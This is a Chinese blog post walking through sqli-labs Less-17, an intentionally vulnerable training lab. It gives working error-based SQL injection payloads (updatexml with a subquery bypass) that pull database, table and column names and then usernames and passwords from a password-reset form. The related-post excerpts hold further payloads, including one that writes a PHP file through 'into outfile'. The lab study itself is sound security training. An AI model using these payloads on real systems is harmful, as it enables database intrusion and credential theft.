Sqli-labs less-17

于 2024-08-15 22:17:20 发布
阅读量335 收藏 10
点赞数 5
分类专栏: Sqli-labs 文章标签: less 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46099552/article/details/141233017
版权

less-17

Less-17 Update Query- Error based - String

看对话框是新建用户,是update语句,所以应该是用update语句注入

update <表名> set <列名=更新值> [where <更新条件>]

  1. update语句就知道应该是在密码上注入,输入

    uname=admin&passwd=admin' and 1=1--+&submit=Submit 会报错,所以应该使用报错注入(图放错了)

    在这里插入图片描述

  2. 在burp抓包后放进重放器然后直接粘贴就行

    # 数据库
uname=admin&passwd=1233' and (select updatexml(1,concat('~',database()),1))--+&submit=Submit

# 表
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1))--+ &submit=Submit

# 列
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),1))--+ &submit=Submit

  3. 爆数据

    uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(username) from users)),1))--+ &submit=Submit

    发现会报错:You can't specify target table 'users' for update in FROM clause

    大概就是:你不能在update一张表的时候再select一张表

    可以使用子查询来绕过

    # 爆用户名
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(username) from (select * from users) as a)),1))--+ &submit=Submit

# 密码
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(password) from (select * from users) as a)),1))--+ &submit=Submit
Sunset-_
关注
专栏目录
sqli-labs Less-17sqli-labs闯关指南 17)--增删改函数介绍
m0_54899775的博客
12-18 693
sqli-labs Less-17sqli-labs闯关指南 17
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1442
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
floor报错注入的两种格式
aitong的博客
01-31 481
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
sqli-labs/Less-17
m0_71299382的博客
11-18 160
sqli-labs第十七关
Sqli-labs之Less-17
m0_46315342的博客
06-04 689
                                          &nbs...
sqli-labs (less 17)
Xi4or0uji
08-01 484
less 17 报错函数注入 在开始放出payload之前,可能要先稍微提一下 从后台源码可以看出,uname有个check_input函数过滤,但是passwd没有,所以注入点是在passwd上面 接下来还要看下extractvalue这个报错函数 这里推荐一下官方的解释和一篇讲得简单点的博客 https://dev.mysql.com/doc/refman/5.7/en/xml-f...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1913
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs-Less-17
giun的博客
02-13 527
这一关与密码有关,我们尝试下报错 输入username:admin password=1' 故对密码处理时应该使用“ 报错注入 username:admin password:1'and extractvalue(1,concat(0x7e,(select version()),0x7e))# version()可以换成其他语句进行注入 延时注入 username:admin pass...
Sqli-labs Less17 报错型更新语句盲注 - POST
kevinhanser
08-09 946
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 17: POST - Update Query - Error Based- String 测试漏洞 本关我们可以看到是一个修改密码的过程 username 输入 admin password 输入 pass' 显示错误信息 You have an error in your SQL...
SQLi-labs(Less-17
weixin_41182861的博客
08-01 169
Less-17 POST - Update Query- Error Based - String 在username中输入任何测试符号都无济于事。查看源码,后端对uname有过滤: function check_input($value) { if(!empty($value)) //检测这个形参是否为空。 { // truncation (see comments) $value = substr($value,0,15); //分割一串字符串的效果, 第二个参数是从第0个
Sqlilabs Less-17
Light_inthe_eyes的博客
03-07 140
PASSWORD RESET提醒此关可能是password的注入。查看源码,发现逻辑是需要先证明用户存在才能重置密码,既然我们知道admin用户,就直接注入吧。 判断是单引号字符型注入,无回显,用报错注入: uname=admin&passwd=abc'#&submit=Submit 爆库: uname=admin&passwd=abc'+and+extractvalue(1,concat(0x5c,(select+database())))#&submit=Submit
sqli-labs (less-17)
kukudeshuo的博客
03-11 322
sqli-labs (less-17) 进入17关,我们发现17关与前面关卡有所不同,他是要我们输入用户名然后修改密码,我们这里把密码依然改为admin等进去试试 我们继续利用hackbar抓取POST的内容,抓取后我们判断注入点。作者试了很多次,17关输入用户名的位置是没有注入点的,所以我们在更改密码的位置判断注入点 输入 uname=admin&passwd=admin'&submit=Submit #有完整错误回显 所以这里我们使用报错注入攻击 查看当前数据库 uname=adm
SQLI-LABS Less-17
Web学习之路
03-24 121
Update注入
sqlilabs less-17
TA不懒,但还没有添加简介
07-05 251
sqlilabs less-17
SQLi LABS Less 17 报错注入
热门推荐
wangyuxiang946的博客
06-22 1万+
SQLi 第十七关,SQLi-LABS Less-17SQLi-LABS Less 17SQLiLABS Less17SQLi Less 17
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值